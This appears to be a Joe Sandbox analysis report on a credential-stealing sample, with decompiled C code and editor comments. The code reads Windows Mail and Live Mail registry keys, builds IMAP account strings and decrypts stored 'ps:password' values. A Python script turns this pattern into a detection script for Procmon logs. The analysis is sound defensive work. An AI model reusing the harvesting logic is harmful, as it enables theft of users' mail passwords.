                                                                                                                                                    						RegCloseKey(_v20);
                                                                                                                                                    					}
                                                                                                                                                    					_v40 = _v16;
                                                                                                                                                    					_v36 = _v12;
                                                                                                                                                    					_v32 =  &_v556;
                                                                                                                                                    					_v44 = _t107;
                                                                                                                                                    					if(E00404811( &_v1080,  &_v44,  &_v36,  &_v28) != 0) {
                                                                                                                                                    						_t108 = _a8;
                                                                                                                                                    						WideCharToMultiByte(0, 0, _v24, _v28 >> 1, _t108 + 0x400, 0xff, 0, 0);
                                                                                                                                                    						(_t108 + 0x400)[_v28 >> 1] = 0;
                                                                                                                                                    						LocalFree(_v24);
                                                                                                                                                    					}
                                                                                                                                                    					_push(_v16);
                                                                                                                                                    					L004115D6();
                                                                                                                                                    				}
                                                                                                                                                    				return E004047F1( &_v1080);
                                                                                                                                                    			}
Addresses: 0x00410525, 0x00410525, 0x00410536, 0x00410538, 0x00410544, 0x0041054c, 0x00410551, 0x00410556, 0x00410558, 0x00410558, 0x0041055c, 0x00410562, 0x00410566, 0x00410567, 0x0041056a, 0x0041056c, 0x0041056f, 0x00410576, 0x0041057d, 0x00410581, 0x00410587, 0x0041058a, 0x0041058d, 0x0041058e, 0x0041056c, 0x004105a1, 0x004105a8, 0x004105bc, 0x004105bf, 0x004105c5, 0x004105cd, 0x004105d9, 0x004105e2, 0x004105e5, 0x004105e7, 0x00000000, 0x004105e7, 0x004105db, 0x004105db, 0x004105ec, 0x004105f3, 0x004105f9, 0x004105f9, 0x00410614, 0x00410629, 0x0041062c, 0x00410637, 0x00410637, 0x00410640, 0x00410646, 0x0041064f, 0x00410664, 0x0041066e, 0x00410670, 0x00410688, 0x00410693, 0x0041069d, 0x0041069d, 0x004106a3, 0x004106a6, 0x004106ac, 0x004106bb

                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 004046D7: strcpy.MSVCRT ref: 00404726
                                                                                                                                                      • Part of subcall function 004047A0: LoadLibraryA.KERNELBASE(?,0040D60E,80000001,7554F420), ref: 004047A8
                                                                                                                                                      • Part of subcall function 004047A0: GetProcAddress.KERNEL32(00000000,?), ref: 004047C0
                                                                                                                                                    • strlen.MSVCRT ref: 0041054C
                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT ref: 0041055C
                                                                                                                                                    • memset.MSVCRT ref: 004105A8
                                                                                                                                                    • memset.MSVCRT ref: 004105C5
                                                                                                                                                    • strcpy.MSVCRT(?,Software\Microsoft\Windows Live Mail), ref: 004105F3
                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00410637
                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,000000FF,00000000,00000000,?,?,?), ref: 00410688
                                                                                                                                                    • LocalFree.KERNEL32(?), ref: 0041069D
                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT ref: 004106A6
                                                                                                                                                      • Part of subcall function 00406512: strtoul.MSVCRT ref: 0040651A
                                                                                                                                                    Strings
                                                                                                                                                    • Software\Microsoft\Windows Live Mail, xrefs: 004105E7
                                                                                                                                                    • Software\Microsoft\Windows Mail, xrefs: 004105DB
                                                                                                                                                    • Salt, xrefs: 00410621
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: memsetstrcpy$??2@??3@AddressByteCharCloseFreeLibraryLoadLocalMultiProcWidestrlenstrtoul
                                                                                                                                                    • String ID: Salt$Software\Microsoft\Windows Live Mail$Software\Microsoft\Windows Mail
                                                                                                                                                    • API String ID: 1673043434-2687544566
                                                                                                                                                    • Opcode ID: e02606ea618a87a1148e8cb15b8a6f6052109a9c4d8ad17a07ff7bfd0f9df468
                                                                                                                                                    • Instruction ID: 7afd7cd9a60bb03764dcbc3854d87102a14f95683297c5d7d0928fc071fa2b2b
                                                                                                                                                    • Opcode Fuzzy Hash: e02606ea618a87a1148e8cb15b8a6f6052109a9c4d8ad17a07ff7bfd0f9df468
                                                                                                                                                    • Instruction Fuzzy Hash: D14186B2C0011CAECB11DBA5DC81ADEBBBCAF48344F1041ABE645F3251DA349A95CB68
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    C-Code - Quality: 82%
                                                                                                                                                    			E0040CBA7(intOrPtr __ecx, intOrPtr _a4) {
                                                                                                                                                    				intOrPtr _v8;
                                                                                                                                                    				void _v619;
                                                                                                                                                    				char _v620;
                                                                                                                                                    				void _v1231;
                                                                                                                                                    				char _v1232;
                                                                                                                                                    				void* __edi;
                                                                                                                                                    				void* _t37;
                                                                                                                                                    				void* _t53;
                                                                                                                                                    				char* _t54;
                                                                                                                                                    				intOrPtr _t60;
	void* _t61;
	char* _t62;
	void* _t67;
	intOrPtr _t84;
	void* _t85;
	intOrPtr _t87;
	void* _t88;
	void* _t89;

	_t87 = _a4;
	_t84 = __ecx;
	_v8 = __ecx;
	if( *((intOrPtr*)(_t87 + 0x1c)) <= 0) {
		_t37 = 0;
	} else {
		_t37 =  *((intOrPtr*)( *((intOrPtr*)(_t87 + 0xc)))) +  *((intOrPtr*)(_t87 + 0x10));
	}
	_push(0xa);
	_push("mailbox://");
	_push(_t37);
	L00411612();
	_t89 = _t88 + 0xc;
	if(_t37 == 0) {
		L8:
		_a4 = 0;
		if( *((intOrPtr*)(_t84 + 0x474)) > 0) {
			while(1) {
				_t85 = E0040D438(_a4, _t84 + 0x468);
				_v620 = 0;
				memset( &_v619, 0, 0x261);
				_v1232 = 0;
				memset( &_v1231, 0, 0x261);
				_t17 = _t85 + 0x104; // 0x104
				_t18 = _t85 + 0x204; // 0x204
				sprintf( &_v620, "mailbox://%s@%s", _t18, _t17);
				_t20 = _t85 + 0x104; // 0x104
				_t21 = _t85 + 0x204; // 0x204
				sprintf( &_v1232, "imap://%s@%s", _t21, _t20);
				_t53 = 0;
				_t89 = _t89 + 0x38;
				if( *((intOrPtr*)(_t87 + 0x1c)) > 0) {
					_t53 =  *((intOrPtr*)( *((intOrPtr*)(_t87 + 0xc)))) +  *((intOrPtr*)(_t87 + 0x10));
				}
				_push(_t53);
				_t54 =  &_v620;
				_push(_t54);
				L004115B2();
				if(_t54 == 0) {
					goto L17;
				}
				_t61 = 0;
				if( *((intOrPtr*)(_t87 + 0x1c)) > 0) {
					_t61 =  *((intOrPtr*)( *((intOrPtr*)(_t87 + 0xc)))) +  *((intOrPtr*)(_t87 + 0x10));
				}
				_push(_t61);
				_t62 =  &_v1232;
				_push(_t62);
				L004115B2();
				if(_t62 != 0) {
					L18:
					_a4 = _a4 + 1;
					_t60 = _v8;
					if(_a4 <  *((intOrPtr*)(_t60 + 0x474))) {
						_t84 = _t60;
						continue;
					} else {
					}
				} else {
					goto L17;
				}
				goto L21;
				L17:
				if( *((char*)(E00406B0F( *((intOrPtr*)(_t87 + 0x1c)) - 1, _t87))) == 0x7e) {
					E00401380(_t57 + 1, _t85 + 0x304, 0xff);
				} else {
					goto L18;
				}
				goto L21;
			}
		}
	} else {
		if( *((intOrPtr*)(_t87 + 0x1c)) <= 0) {
			_t67 = 0;
		} else {
			_t67 =  *((intOrPtr*)( *((intOrPtr*)(_t87 + 0xc)))) +  *((intOrPtr*)(_t87 + 0x10));
		}
		_push(7);
		_push("imap://");
		_push(_t67);
		L00411612();
		_t89 = _t89 + 0xc;
		if(_t67 == 0) {
			goto L8;
		}
	}
	L21:
	return 1;
}

APIs
Strings
Memory Dump Source
• Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: _stricmp_strnicmpmemsetsprintf$strlen
• String ID: imap://$imap://%s@%s$mailbox://$mailbox://%s@%s
• API String ID: 4281260487-2229823034
• Opcode ID: e9e02f881341a7f68f4078179dffa19dbd3d5546575d598c2616a551df887c2f
• Instruction ID: 9e102a0fb77db954c7e66e430d6901f6f24083c0ab16dd7aca32eaa7b9d40139
• Opcode Fuzzy Hash: e9e02f881341a7f68f4078179dffa19dbd3d5546575d598c2616a551df887c2f
• Instruction Fuzzy Hash: B84163B1604205EFD724DB69C881F96B7E8AF04344F144A7BEA4AE7281D738FA448B58
Uniqueness

Uniqueness Score: -1.00%

                                                                                                                                                    C-Code - Quality: 82%
E0040CBA5(void* __eax, intOrPtr __ecx, intOrPtr _a4) {
	intOrPtr _v8;
	void _v619;
	char _v620;
	void _v1231;
	char _v1232;
	void* __edi;
	void* _t39;
	void* _t55;
	char* _t56;
	intOrPtr _t62;
	void* _t63;
	char* _t64;
	void* _t69;
	intOrPtr _t89;
	void* _t91;
	intOrPtr _t94;
	void* _t99;
	void* _t100;
	void* _t101;

	_t100 = _t99 - 0x4cc;
	_t94 = _a4;
	_t89 = __ecx;
	_v8 = __ecx;
	if( *((intOrPtr*)(_t94 + 0x1c)) <= 0) {
		_t39 = 0;
	} else {
		_t39 =  *((intOrPtr*)( *((intOrPtr*)(_t94 + 0xc)))) +  *((intOrPtr*)(_t94 + 0x10));
	}
	_push(0xa);
	_push("mailbox://");
	_push(_t39);
	L00411612();
	_t101 = _t100 + 0xc;
	if(_t39 == 0) {
		L9:
		_a4 = 0;
		if( *((intOrPtr*)(_t89 + 0x474)) > 0) {
			while(1) {
				_t91 = E0040D438(_a4, _t89 + 0x468);
				_v620 = 0;
				memset( &_v619, 0, 0x261);
				_v1232 = 0;
				memset( &_v1231, 0, 0x261);
				_t17 = _t91 + 0x104; // 0x104
				_t18 = _t91 + 0x204; // 0x204
				sprintf( &_v620, "mailbox://%s@%s", _t18, _t17);
				_t20 = _t91 + 0x104; // 0x104
				_t21 = _t91 + 0x204; // 0x204
				sprintf( &_v1232, "imap://%s@%s", _t21, _t20);
				_t55 = 0;
				_t101 = _t101 + 0x38;
				if( *((intOrPtr*)(_t94 + 0x1c)) > 0) {
					_t55 =  *((intOrPtr*)( *((intOrPtr*)(_t94 + 0xc)))) +  *((intOrPtr*)(_t94 + 0x10));
				}
				_push(_t55);
				_t56 =  &_v620;
				_push(_t56);
				L004115B2();
				if(_t56 == 0) {
					goto L18;
				}
				_t63 = 0;
				if( *((intOrPtr*)(_t94 + 0x1c)) > 0) {
					_t63 =  *((intOrPtr*)( *((intOrPtr*)(_t94 + 0xc)))) +  *((intOrPtr*)(_t94 + 0x10));
				}
				_push(_t63);
				_t64 =  &_v1232;
				_push(_t64);
				L004115B2();
				if(_t64 != 0) {
					L19:
					_a4 = _a4 + 1;
					_t62 = _v8;
					if(_a4 <  *((intOrPtr*)(_t62 + 0x474))) {
						_t89 = _t62;
						continue;
					} else {
					}
				} else {
					goto L18;
				}
				goto L22;
				L18:
				if( *((char*)(E00406B0F( *((intOrPtr*)(_t94 + 0x1c)) - 1, _t94))) == 0x7e) {
					E00401380(_t59 + 1, _t91 + 0x304, 0xff);
				} else {
					goto L19;
				}
				goto L22;
			}
		}
	} else {
		if( *((intOrPtr*)(_t94 + 0x1c)) <= 0) {
			_t69 = 0;
		} else {
			_t69 =  *((intOrPtr*)( *((intOrPtr*)(_t94 + 0xc)))) +  *((intOrPtr*)(_t94 + 0x10));
		}
		_push(7);
		_push("imap://");
		_push(_t69);
		L00411612();
		_t101 = _t101 + 0xc;
		if(_t69 == 0) {
			goto L9;
		}
	}
	L22:
	return 1;
}

Addresses: 0x0040cbaa, 0x0040cbb2, 0x0040cbbb, 0x0040cbbd, 0x0040cbc0, 0x0040cbcc, 0x0040cbc2, 0x0040cbc7, 0x0040cbc7, 0x0040cbce, 0x0040cbd0, 0x0040cbd5, 0x0040cbd6, 0x0040cbdb, 0x0040cbe0, 0x0040cc0b, 0x0040cc11, 0x0040cc14, 0x0040cc23, 0x0040cc32, 0x0040cc3d, 0x0040cc44, 0x0040cc53, 0x0040cc5a, 0x0040cc5f, 0x0040cc66, 0x0040cc79, 0x0040cc7e, 0x0040cc85, 0x0040cc98, 0x0040cc9d, 0x0040cc9f, 0x0040cca5, 0x0040ccac, 0x0040ccac, 0x0040ccaf, 0x0040ccb0, 0x0040ccb6, 0x0040ccb7, 0x0040ccc0, 0x00000000, 0x00000000, 0x0040ccc2, 0x0040ccc7, 0x0040ccce, 0x0040ccce, 0x0040ccd1, 0x0040ccd2, 0x0040ccd8, 0x0040ccd9, 0x0040cce2, 0x0040ccf4, 0x0040ccf4, 0x0040ccf7, 0x0040cd03, 0x0040cc21, 0x00000000, 0x00000000, 0x0040cd09, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x0040cce4, 0x0040ccf2, 0x0040cd17, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x0040ccf2, 0x0040cc23, 0x0040cbe2, 0x0040cbe5, 0x0040cbf1, 0x0040cbe7, 0x0040cbec, 0x0040cbec, 0x0040cbf3, 0x0040cbf5, 0x0040cbfa, 0x0040cbfb, 0x0040cc00, 0x0040cc05, 0x00000000, 0x00000000, 0x0040cc05, 0x0040cd1d, 0x0040cd24

                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _stricmp_strnicmpmemsetsprintf
                                                                                                                                                    • String ID: imap://$imap://%s@%s$mailbox://$mailbox://%s@%s
                                                                                                                                                    • API String ID: 2822975062-2229823034
                                                                                                                                                    • Opcode ID: b6ee68a00b14a896bd5f4a1625b3665dec952f704790df008a5e90175c698e8f
                                                                                                                                                    • Instruction ID: 56d5f4bbafa72d85e66e322173295d9522024af121689b7315c9fa9ceefdefbd
                                                                                                                                                    • Opcode Fuzzy Hash: b6ee68a00b14a896bd5f4a1625b3665dec952f704790df008a5e90175c698e8f
                                                                                                                                                    • Instruction Fuzzy Hash: 754150B1604605EFD724DB69C8C1F96B7E8AF04304F14466BEA4AE7281D738FA45CB58
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    C-Code - Quality: 56%
			E0040D6FB(void* __ecx, void* __eflags, intOrPtr* _a4, intOrPtr _a8, char _a12, void* _a16) {
				/* The comments in this block are the editor's reading of the decompilation, not Joe Sandbox output.
				   _a4:      object whose first vtable slot is called once per recovered credential;
				             _a4 + 0xc is handed to the decrypt helper as its context
				   _a8/_a12: pointer and length of an optional secondary-entropy buffer
				   _a16:     parent registry key; replaced below by the handle of its "Creds" subkey */
				int _v8;                         /* RegEnumKeyA index */
				int _v12;                        /* in: 0x1000 buffer size; out: bytes of ps:password read */
				void* _v16;                      /* handle of the per-account subkey */
				short* _v20;                     /* out blob: pbData, decrypted UTF-16 password */
				int _v24;                        /* out blob: cbData */
				char* _v28;                      /* in blob: pbData = raw ps:password value */
				char _v32;                       /* in blob: cbData (really a DWORD; the type is a decompiler guess) */
				intOrPtr _v36;                   /* entropy blob: pbData */
				char _v40;                       /* entropy blob: cbData */
				int _v44;                        /* value type from RegQueryValueExA */
				void _v299;
				char _v300;                      /* 256-byte subkey (account) name */
				char _v556;                      /* record + 256: ANSI password */
				char _v812;                      /* record + 0: account name; the record is passed to the callback */
				char _v4908;                     /* 0x1000-byte raw value buffer */
				void* __ebx;
				void* __edi;
				long _t46;
				int* _t84;
				char* _t85;

				E004118A0(0x132c, __ecx);                                  /* stack probe for the 0x132c-byte frame */
				_t84 = 0;
				_t46 = RegOpenKeyExA(_a16, "Creds", 0, 0x20019,  &_a16);   /* 0x20019 == KEY_READ */
				if(_t46 != 0) {
					return _t46;
				}
				_v300 = _t46;
				memset( &_v299, 0, 0xff);                                   /* zero the 256-byte name buffer */
				_push(0xff);                                                /* these _push() calls are the RegEnumKeyA arguments the */
				_push( &_v300);                                             /* decompiler could not fold into the call, shown as "??" */
				_v8 = 0;                                                    /* below: RegEnumKeyA(hCreds, index, name, 0xff)         */
				_push(0);
				while(RegEnumKeyA(_a16, ??, ??, ??) == 0) {                  /* one iteration per account subkey */
					if(RegOpenKeyExA(_a16,  &_v300, _t84, 0x20019,  &_v16) == 0) {
						_v12 = 0x1000;
						if(RegQueryValueExA(_v16, "ps:password", _t84,  &_v44,  &_v4908,  &_v12) == 0) {
							_v32 = _v12;                                        /* in.cbData = bytes read */
							_v28 =  &_v4908;                                    /* in.pbData = raw value */
							_v40 = _a12;                                        /* entropy.cbData */
							_v36 = _a8;                                         /* entropy.pbData */
							/* Three {cbData, pbData} pairs plus the LocalFree() on the result match the
							   CryptUnprotectData calling convention, so E00404811 is most likely a DPAPI wrapper. */
							if(E00404811(_a4 + 0xc,  &_v32,  &_v40,  &_v24) != 0) {
								_t85 =  &_v812;
								_v812 = 0;
								_v556 = 0;
								E004060D0(0xff, _t85,  &_v300);                  /* bounded copy of the account name to record + 0 */
								WideCharToMultiByte(0, 0, _v20, _v24,  &_v556, 0xff, 0, 0); /* UTF-16 -> ANSI into record + 256 */
								 *((intOrPtr*)( *_a4))(_t85);                    /* virtual call: hand the record to the collector */
								LocalFree(_v20);                                 /* release the decrypted buffer */
								_t84 = 0;                                        /* the call clobbered the register holding 0 */
							}
						}
						RegCloseKey(_v16);
					}
					_v8 = _v8 + 1;
					_push(0xff);
					_push( &_v300);
					_push(_v8);
				}
				return RegCloseKey(_a16);
			}

Instruction addresses for E0040D6FB (one per line of the C-Code block above; 0x00000000 marks lines with no mapped instruction): 0x0040d703, 0x0040d71a, 0x0040d725, 0x0040d729, 0x0040d862, 0x0040d862, 0x0040d735, 0x0040d743, 0x0040d74b, 0x0040d752, 0x0040d753, 0x0040d756, 0x0040d844, 0x0040d774, 0x0040d792, 0x0040d7a1, 0x0040d7aa, 0x0040d7b3, 0x0040d7b9, 0x0040d7bf, 0x0040d7db, 0x0040d7e4, 0x0040d7ea, 0x0040d7f1, 0x0040d7f8, 0x0040d812, 0x0040d820, 0x0040d825, 0x0040d82b, 0x0040d82b, 0x0040d7db, 0x0040d830, 0x0040d830, 0x0040d836, 0x0040d839, 0x0040d840, 0x0040d841, 0x0040d841, 0x00000000

                                                                                                                                                    APIs
                                                                                                                                                    • RegOpenKeyExA.ADVAPI32(0040DB12,Creds,00000000,00020019,0040DB12,%GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd,00000040,?,?,0040DB12,?,?,?,?), ref: 0040D725
                                                                                                                                                    • memset.MSVCRT ref: 0040D743
                                                                                                                                                    • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 0040D770
                                                                                                                                                    • RegQueryValueExA.ADVAPI32(?,ps:password,00000000,?), ref: 0040D799
                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,000000FF,00000000,00000000), ref: 0040D812
                                                                                                                                                    • LocalFree.KERNEL32(?), ref: 0040D825
                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 0040D830
                                                                                                                                                    • RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 0040D847
                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 0040D858
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CloseOpen$ByteCharEnumFreeLocalMultiQueryValueWidememset
                                                                                                                                                    • String ID: %GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd$Creds$ps:password
                                                                                                                                                    • API String ID: 551151806-1288872324
                                                                                                                                                    • Opcode ID: d3552b054e42a9a62031a540664540df19a8533d219857e9c55738ce323a5c80
                                                                                                                                                    • Instruction ID: ba0b8c8cecfa7ea512c31dd79fcda3fb233e403caecda4e29e00fc0c4110e127
                                                                                                                                                    • Opcode Fuzzy Hash: d3552b054e42a9a62031a540664540df19a8533d219857e9c55738ce323a5c80
                                                                                                                                                    • Instruction Fuzzy Hash: 864129B2900209AFDB11DF95DD84EEFBBBCEB48344F0041A6FA15E2150DA749A94CB64
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%
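
Added example, not part of the Joe Sandbox report and not code from the sample: the registry access pattern of E0040D6FB (open "Creds", enumerate its subkeys, query a "ps:password" value under each one) is what an analyst can look for in Process Monitor telemetry, since Sysmon records registry writes but not reads. The script parses a Procmon CSV export (the tool's default column set) and flags every process that queries ps:password directly beneath a subkey of a key named Creds. The CSV lines are constructed for the example, and the parent key HKCU\Software\ExampleMail is a placeholder: the real parent key arrives in _a16 and is not visible in the report. The Result column is ignored on purpose, because the loop queries every subkey whether or not the value exists, so the attempt itself is the indicator.

```python
import csv
import io
from collections import defaultdict

# Constructed Procmon CSV export mimicking the access pattern of the decompiled
# loop: open "Creds", then per subkey open / RegQueryValue "ps:password" / close.
# Every line is made up for this example; "ExampleMail" is a placeholder for the
# parent key, which the report does not show (it is passed in as _a16).
SAMPLE_PROCMON_CSV = r'''"Time of Day","Process Name","PID","Operation","Path","Result","Detail"
"10:01:02.0000001","vbc.exe","1234","RegOpenKey","HKCU\Software\ExampleMail\Creds","SUCCESS","Desired Access: Read"
"10:01:02.0000002","vbc.exe","1234","RegEnumKey","HKCU\Software\ExampleMail\Creds","SUCCESS","Index: 0, Name: alice@example.org"
"10:01:02.0000003","vbc.exe","1234","RegOpenKey","HKCU\Software\ExampleMail\Creds\alice@example.org","SUCCESS","Desired Access: Read"
"10:01:02.0000004","vbc.exe","1234","RegQueryValue","HKCU\Software\ExampleMail\Creds\alice@example.org\ps:password","SUCCESS","Type: REG_BINARY, Length: 230"
"10:01:02.0000005","vbc.exe","1234","RegCloseKey","HKCU\Software\ExampleMail\Creds\alice@example.org","SUCCESS",""
"10:01:02.0000006","vbc.exe","1234","RegEnumKey","HKCU\Software\ExampleMail\Creds","SUCCESS","Index: 1, Name: bob@example.org"
"10:01:02.0000007","vbc.exe","1234","RegOpenKey","HKCU\Software\ExampleMail\Creds\bob@example.org","SUCCESS","Desired Access: Read"
"10:01:02.0000008","vbc.exe","1234","RegQueryValue","HKCU\Software\ExampleMail\Creds\bob@example.org\ps:password","NAME NOT FOUND","Length: 4,096"
"10:01:02.0000009","vbc.exe","1234","RegCloseKey","HKCU\Software\ExampleMail\Creds\bob@example.org","SUCCESS",""
"10:01:02.0000010","vbc.exe","1234","RegEnumKey","HKCU\Software\ExampleMail\Creds","NO MORE ENTRIES","Index: 2, Length: 255"
"10:01:02.0000011","vbc.exe","1234","RegCloseKey","HKCU\Software\ExampleMail\Creds","SUCCESS",""
"10:01:05.0000001","explorer.exe","800","RegQueryValue","HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden","SUCCESS","Type: REG_DWORD, Length: 4, Data: 1"
'''


def parse_procmon_csv(text):
    """Parse a Procmon CSV export into a list of dicts keyed by column name."""
    return list(csv.DictReader(io.StringIO(text)))


def split_registry_path(path):
    """Split a Procmon registry path into its components (Procmon uses backslashes)."""
    return [part for part in path.split("\\") if part]


def find_creds_harvesting(events):
    """Return {(process, pid): [account subkeys]} for every process that issued a
    RegQueryValue for a value named 'ps:password' directly beneath a subkey of a
    key named 'Creds'. The Result column is deliberately ignored: the harvester
    queries every subkey, so a failed query is as telling as a successful one."""
    hits = defaultdict(list)
    for ev in events:
        if ev["Operation"] != "RegQueryValue":
            continue
        parts = split_registry_path(ev["Path"])
        # Shape we look for: ...\Creds\<account>\ps:password
        if len(parts) < 3:
            continue
        if parts[-1].lower() != "ps:password" or parts[-3].lower() != "creds":
            continue
        key = (ev["Process Name"], ev["PID"])
        if parts[-2] not in hits[key]:
            hits[key].append(parts[-2])
    return dict(hits)


def describe(hits):
    """One summary line per flagged process, sorted for stable output."""
    return [
        f"{proc} (pid {pid}) queried ps:password for {len(accounts)} account(s): "
        + ", ".join(accounts)
        for (proc, pid), accounts in sorted(hits.items())
    ]


if __name__ == "__main__":
    for line in describe(find_creds_harvesting(parse_procmon_csv(SAMPLE_PROCMON_CSV))):
        print(line)
```

To use it on a real capture, export the Procmon trace as CSV with the default columns and pass the file contents to parse_procmon_csv; the explorer.exe line in the sample is there to show that an ordinary RegQueryValue on an unrelated key is not reported.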

                                                                                                                                                    C-Code - Quality: 56%
			E004080A3(void* __ecx, void* __edi, void* __eflags, struct HINSTANCE__* _a4, intOrPtr _a8, CHAR* _a12) {
				/* The comments in this block are the editor's reading of the decompilation, not Joe Sandbox output.
				   The (hModule, lpType, lpName) argument shape and the 4/5 dispatch match an EnumResNameProc
				   callback: RT_MENU == 4 and RT_DIALOG == 5. _a12 is an integer resource ID, which is why it
				   is formatted with "%d" below. */
				void _v4103;
				char _v4104;                     /* 0x1000-byte window-text buffer */
				char _t30;
				struct HMENU__* _t32;
				char _t39;
				void* _t42;
				struct HWND__* _t43;             /* dialog instantiated from the resource */
				struct HMENU__* _t48;

				_t42 = __edi;
				_t38 = __ecx;
				E004118A0(0x1004, __ecx);                                  /* stack probe for the 0x1004-byte frame */
				_t55 = _a8 - 4;
				if(_a8 != 4) {                                             /* not RT_MENU */
					__eflags = _a8 - 5;
					if(_a8 == 5) {                                         /* RT_DIALOG */
						_t39 =  *0x417488;                                 /* global list consulted first; NULL means process unconditionally */
						__eflags = _t39;
						if(_t39 == 0) {
							L8:
							_push(_t42);
							sprintf(0x4172c0, "dialog_%d", _a12);          /* section name written to a global buffer */
							_t43 = CreateDialogParamA(_a4, _a12, 0, E0040809E, 0); /* instantiate the dialog (never shown) */
							_v4104 = 0;
							memset( &_v4103, 0, 0x1000);
							GetWindowTextA(_t43,  &_v4104, 0x1000);         /* read the dialog caption */
							__eflags = _v4104;
							if(__eflags != 0) {
								E00407E55(__eflags, "caption",  &_v4104);  /* likely emits caption=<text> under the current section */
							}
							EnumChildWindows(_t43, E00407FEB, 0);          /* E00407FEB presumably repeats this for each control */
							DestroyWindow(_t43);
						} else {
							while(1) {
								_t30 =  *_t39;
                                                                                                                                                    								__eflags = _t30;
                                                                                                                                                    								if(_t30 == 0) {
                                                                                                                                                    									goto L8;
                                                                                                                                                    								}
                                                                                                                                                    								__eflags = _t30 - _a12;
                                                                                                                                                    								if(_t30 != _a12) {
                                                                                                                                                    									_t39 = _t39 + 4;
                                                                                                                                                    									__eflags = _t39;
                                                                                                                                                    									continue;
                                                                                                                                                    								}
                                                                                                                                                    								goto L11;
                                                                                                                                                    							}
                                                                                                                                                    							goto L8;
                                                                                                                                                    						}
                                                                                                                                                    						L11:
                                                                                                                                                    					}
                                                                                                                                                    				} else {
                                                                                                                                                    					sprintf(0x4172c0, "menu_%d", _a12);
                                                                                                                                                    					_t32 = LoadMenuA(_a4, _a12);
                                                                                                                                                    					 *0x4171b4 =  *0x4171b4 & 0x00000000;
                                                                                                                                                    					_t48 = _t32;
                                                                                                                                                    					_push(1);
                                                                                                                                                    					_push(_t48);
                                                                                                                                                    					_push(_a12);
                                                                                                                                                    					E00407EFB(_t38, _t55);
                                                                                                                                                    					DestroyMenu(_t48);
                                                                                                                                                    				}
                                                                                                                                                    				return 1;
                                                                                                                                                    			}

                                                                                                                                                    APIs
                                                                                                                                                    • sprintf.MSVCRT ref: 004080C4
                                                                                                                                                    • LoadMenuA.USER32 ref: 004080D2
                                                                                                                                                      • Part of subcall function 00407EFB: GetMenuItemCount.USER32 ref: 00407F10
                                                                                                                                                      • Part of subcall function 00407EFB: memset.MSVCRT ref: 00407F31
                                                                                                                                                      • Part of subcall function 00407EFB: GetMenuItemInfoA.USER32 ref: 00407F6C
                                                                                                                                                      • Part of subcall function 00407EFB: strchr.MSVCRT ref: 00407F83
                                                                                                                                                    • DestroyMenu.USER32(00000000), ref: 004080F0
                                                                                                                                                    • sprintf.MSVCRT ref: 00408134
                                                                                                                                                    • CreateDialogParamA.USER32(?,00000000,00000000,0040809E,00000000), ref: 00408149
                                                                                                                                                    • memset.MSVCRT ref: 00408165
                                                                                                                                                    • GetWindowTextA.USER32 ref: 00408176
                                                                                                                                                    • EnumChildWindows.USER32 ref: 0040819E
                                                                                                                                                    • DestroyWindow.USER32(00000000), ref: 004081A5
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Menu$DestroyItemWindowmemsetsprintf$ChildCountCreateDialogEnumInfoLoadParamTextWindowsstrchr
